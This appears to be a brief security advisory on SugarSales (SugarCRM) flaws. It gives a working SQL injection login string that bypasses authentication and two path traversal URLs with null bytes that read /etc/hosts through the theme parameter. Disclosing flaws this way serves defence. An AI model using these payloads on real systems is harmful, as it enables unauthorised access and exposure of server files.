|
SugarSales Multiple Remote Vulnerabilities
Example URIs sufficient to exploit these vulnerabilities have been provided: To log into SugarSales, utilize the username "admin' or 1=1 -- " with any password. To disclose the contents of potentially sensitive files: http://www.example.com/sugarcrm/modules/Users/Login.php?theme=/../../../etc/hosts%00 http://www.example.com/sugarcrm/modules/Calls/index.php?theme=/../../../etc/hosts%00 |
|
|
Privacy Statement |
